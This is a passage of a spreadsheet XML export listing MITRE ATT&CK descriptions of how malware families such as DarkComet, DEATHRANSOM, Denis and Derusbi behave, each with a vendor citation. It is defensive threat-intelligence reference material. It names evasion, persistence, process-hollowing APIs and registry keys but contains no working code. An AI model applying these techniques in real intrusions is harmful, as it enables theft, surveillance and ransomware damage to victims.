    <t>[DCSrv](https://attack.mitre.org/software/S1033) can compare the current time on an infected host with a configuration value to determine when to start the encryption process.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[DCSrv](https://attack.mitre.org/software/S1033) has created new services for persistence by modifying the Registry.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) decodes an embedded configuration using XOR.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) lists files on the victim’s machine.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) downloads and uploads files on the victim’s machine.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) uses Rundll32 to ensure only a single instance of itself is running at once.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[DEATHRANSOM](https://attack.mitre.org/software/S0616) can use public and private key pair encryption to encrypt files for ransom payment.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[DEATHRANSOM](https://attack.mitre.org/software/S0616) can use loop operations to enumerate directories on a compromised host.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[DEATHRANSOM](https://attack.mitre.org/software/S0616) can download files to a compromised host.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[DEATHRANSOM](https://attack.mitre.org/software/S0616) can delete volume shadow copies on compromised hosts.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[DEATHRANSOM](https://attack.mitre.org/software/S0616) has the ability to use loop operations to enumerate network resources.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[DEATHRANSOM](https://attack.mitre.org/software/S0616) can enumerate logical drives on a target system.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>Some versions of [DEATHRANSOM](https://attack.mitre.org/software/S0616) have performed language ID and keyboard layout checks; if either of these matched Russian, Kazakh, Belarusian, Ukrainian or Tatar [DEATHRANSOM](https://attack.mitre.org/software/S0616) would exit.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[DEATHRANSOM](https://attack.mitre.org/software/S0616) can use HTTPS to download files.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[DEATHRANSOM](https://attack.mitre.org/software/S0616) has the ability to use WMI to delete volume shadow copies.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) can capture microphone data from the victim's machine.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is capable of leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex for C2.(Citation: FireEye APT37 Feb 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) can download and execute additional payloads.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is capable of logging keystrokes.(Citation: FireEye APT37 Feb 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is encrypted using single-byte XOR.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is capable of capturing screenshots of the victim's machine.(Citation: FireEye APT37 Feb 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can collect information from a compromised host.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can use `IsDebuggerPresent` to detect whether a debugger is present on a victim.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can deploy additional tools onto an infected machine.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) has been named `Flash.exe`, and its dropper has been named `IExplorer`.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can use various API calls to see if it is running in a sandbox.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can be partly encrypted with XOR.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can enumerate and examine running processes to determine if a debugger is present.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can search for other machines connected to compromised host and attempt to map the network.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694)'s dropper can be packed with UPX.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can obtain a list of users from an infected machine.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can use the `GetTickCount` and `GetSystemTimeAsFileTime` API calls to inspect system time.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can use the `GetTickCount` and `GetSystemTimeAsFileTime` API calls to measure function timing.(Citation: ClearSky Lazarus Aug 2020) [DRATzarus](https://attack.mitre.org/software/S0694) can also remotely shut down into sleep mode under specific conditions to evade 
detection.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) can use HTTP or HTTPS for C2 communications.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can scan directories on a compromised host.(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) has had its payload named with a dot prefix to make it hidden from view in the Finder application.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can download its payload from a C2 server.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can establish persistence via a LaunchAgent.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can establish persistence via a Launch Daemon.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>The [Dacls](https://attack.mitre.org/software/S0497) Mach-O binary has been disguised as a .nib file.(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can encrypt its configuration file with AES CBC.(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can collect data on running and parent processes.(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) can use HTTPS in C2 communications.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can use use IPv4 A records and IPv6 AAAA DNS records in C2 communications.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can upload files from compromised hosts.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can use a VBA macro to decode its payload prior to installation and execution.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can delete its configuration file after installation.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can download additional files to a targeted system.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) has relied on victims' opening a malicious file for initial execution.(Citation: SecureWorks August 2019)(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) files have been named `UltraVNC.exe` and `WINVNC.exe` to appear as legitimate VNC tools.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can Base64 encode its payload.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can use a scheduled task for installation.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[DanBot](https://attack.mitre.org/software/S1014) has been distributed within a malicious Excel attachment via spearphishing emails.(Citation: SecureWorks August 2019) </t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can use VNC for remote access to targeted systems.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can use a VBA macro embedded in an Excel file to drop the payload.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) can use HTTP in C2 communication.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) has the ability to execute arbitrary commands via `cmd.exe`.(Citation: SecureWorks August 2019)(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can listen in to victims' conversations through the system’s microphone.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can steal data from the clipboard.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can execute various types of scripts on the victim’s machine.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can disable Security Center functions like the Windows Firewall.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can disable Security Center functions like anti-virus.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can load any files onto the infected machine to execute.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) has a keylogging capability.(Citation: TrendMicro DarkComet Sept 2014)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) has dropped itself onto victim machines with file names such as WinDefender.Exe and winupdate.exe in an apparent attempt to masquerade as a legitimate file.(Citation: TrendMicro DarkComet Sept 2014)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) adds a Registry value for its installation routine to the Registry Key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System Enable LUA=”0”&lt;/code&gt; and &lt;code&gt;HKEY_CURRENT_USER\Software\DC3_FEXEC&lt;/code&gt;.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can list active processes running on the victim’s machine.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) adds several Registry entries to enable automatic execution at every system startup.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can open an active screen of the victim’s machine and take control of the mouse and keyboard.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) has the option to compress its payload using UPX or MPRESS.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can collect the computer name, RAM used, and operating system version from the victim’s machine.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) gathers the username from the victim’s machine.(Citation: TrendMicro DarkComet Sept 2014)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can access the victim’s webcam to take pictures.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can use HTTP for C2 communications.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) can launch a remote shell to execute commands on the victim’s machine.(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) reports window names along with keylogger information to provide application context.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can use TLS to encrypt its C2 channel.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can retrieve browser history.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[DarkWatchman](https://attack.mitre.org/software/S0673) has used the &lt;code&gt;csc.exe&lt;/code&gt; tool to compile a C# executable.(Citation: Prevailion DarkWatchman 2021) </t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can collect files from a compromised host.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has the ability to self-extract as a RAR archive.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has used a DGA to generate a domain name for C2.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has been observed deleting its original launcher after installation.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has the ability to enumerate file and folder names.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can uninstall malicious components from the Registry, stop processes, and clear the browser history.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can delete shadow volumes using &lt;code&gt;vssadmin.exe&lt;/code&gt;.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) uses JavaScript to perform its core functionalities.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can track key presses with a keylogger module.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can stage local data in the Windows Registry.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has used an icon mimicking a text file to mask a malicious executable.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can store configuration strings, keylogger, and output of components in the Registry.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has used Base64 to encode PowerShell commands. [DarkWatchman](https://attack.mitre.org/software/S0673) has been delivered as compressed RAR payloads in ZIP files to victims.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can list signed PnP drivers for smartcard readers.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can execute PowerShell commands and has used PowerShell to execute a keylogger.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can query the Registry to determine if it has already been installed on the system.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has created a scheduled task for persistence.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can search for anti-virus products on the system.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can load DLLs.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has been delivered via spearphishing emails that contain a malicious zip file.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) encodes data using hexadecimal representation before sending it to the C2 server.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can collect the OS version, system architecture, uptime, and computer name.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can identity the OS locale of a compromised host.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has collected the username from a victim machine.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can collect the time zone information from the system.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) uses HTTPS for command and control.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can use `cmd.exe` to execute commands.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can use WMI to execute commands.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) hides collected data in password-protected .rar archives.(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>Some [Daserf](https://attack.mitre.org/software/S0187) samples were signed with a stolen digital certificate.(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>Analysis of [Daserf](https://attack.mitre.org/software/S0187) has shown that it regularly undergoes technical improvements to evade anti-virus detection.(Citation: Trend Micro Daserf Nov 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can download remote files.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can log keystrokes.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) leverages [Mimikatz](https://attack.mitre.org/software/S0002) and [Windows Credential Editor](https://attack.mitre.org/software/S0005) to steal credentials.(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses file and folder names related to legitimate programs in order to blend in, such as HP, Intel, Adobe, and perflogs.(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses encrypted Windows APIs and also encrypts data using the alternative base64+RC4 or the Caesar cipher.(Citation: Trend Micro Daserf Nov 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can take screenshots.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>A version of [Daserf](https://attack.mitre.org/software/S0187) uses the MPRESS packer.(Citation: Trend Micro Daserf Nov 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses custom base64 encoding to obfuscate HTTP traffic.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can use steganography to hide malicious code downloaded to the victim.(Citation: Trend Micro Daserf Nov 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses RC4 encryption to obfuscate HTTP traffic.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses HTTP for C2.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can execute shell commands.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[DealersChoice](https://attack.mitre.org/software/S0243) leverages vulnerable versions of Flash to perform execution.(Citation: Sofacy DealersChoice)</t>
  </si>
  <si>
    <t>[DealersChoice](https://attack.mitre.org/software/S0243) uses HTTP for communication with the C2 server.(Citation: Sofacy DealersChoice)</t>
  </si>
  <si>
    <t>[DealersChoice](https://attack.mitre.org/software/S0243) makes modifications to open-source scripts from GitHub and executes them on the victim’s machine.(Citation: Sofacy DealersChoice)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) compressed collected data using zlib.(Citation: Securelist Denis April 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) exploits a security vulnerability to load a fake DLL and execute its code.(Citation: Cybereason Oceanlotus May 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) has used DNS tunneling for C2 communications.(Citation: Cybereason Oceanlotus May 2017)(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) will decrypt important strings used for C&amp;C communication.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) has a command to delete files from the victim’s machine.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) has several commands to search directories for files.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) replaces the nonexistent Windows DLL "msfte.dll" with its own malicious version, which is loaded by the SearchIndexer.exe and SearchProtocolHost.exe.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) deploys additional backdoors and hacking tools to the system.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Denis](https://attack.mitre.org/software/S0354) used the &lt;code&gt;IsDebuggerPresent&lt;/code&gt;, &lt;code&gt;OutputDebugString&lt;/code&gt;, and &lt;code&gt;SetLastError&lt;/code&gt; APIs to avoid debugging. [Denis](https://attack.mitre.org/software/S0354) used &lt;code&gt;GetProcAddress&lt;/code&gt; and &lt;code&gt;LoadLibrary&lt;/code&gt; to dynamically resolve APIs. [Denis](https://attack.mitre.org/software/S0354) also used the &lt;code&gt;Wow64SetThreadContext&lt;/code&gt; API as part of a process hollowing process.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) obfuscates its code and encrypts the API names. [Denis](https://attack.mitre.org/software/S0354) also encodes its payload in Base64.(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Denis](https://attack.mitre.org/software/S0354) has a version written in PowerShell.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) performed process hollowing through the API calls CreateRemoteThread, ResumeThread, and Wow64SetThreadContext.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) queries the Registry for keys and values.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) encodes the data sent to the server in Base64.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) ran multiple system checks, looking for processor and register characteristics, to evade emulation and analysis.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) collects OS information and the computer name from the victim’s machine.(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) uses &lt;code&gt;ipconfig&lt;/code&gt; to gather the IP address from the system.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) enumerates and collects the username from the victim’s machine.(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) can launch a remote shell to execute arbitrary commands on the victim’s machine.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of performing audio captures.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) injects itself into the secure shell (SSH) process.(Citation: Airbus Derusbi 2015)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) uses a backup communication method with an HTTP beacon.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of deleting files. It has been observed loading a Linux Kernel Module (LKM) and then deleting it from the hard disk as well as overwriting the data with null bytes.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of obtaining directory, file, and drive listings.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of logging keystrokes.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) binds to a raw socket on a random source port between 31800 and 31900 for C2.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) has used unencrypted HTTP on port 443 for C2.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) collects current and parent process IDs.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of enumerating Registry keys and values.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) variants have been seen that use Registry persistence to proxy execution through regsvr32.exe.(Citation: ThreatGeek Derusbi Converge)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of performing screen captures.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) obfuscates C2 traffic with variable 4-byte XOR keys.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) gathers the name of the local host, version of GNU Compiler Collection (GCC), and the system information about the CPU, machine, and operating system.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>A Linux version of [Derusbi](https://attack.mitre.org/software/S0021) checks if the victim user ID is anything other than zero (normally used for root), and the malware will not execute if it does not have root privileges. [Derusbi](https://attack.mitre.org/software/S0021) also gathers the username of the victim.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>The [Derusbi](https://attack.mitre.org/software/S0021) malware supports timestomping.(Citation: Novetta-Axiom)(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of creating a remote Bash shell and executing commands.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of capturing video.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) can delete specified files from a targeted system.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
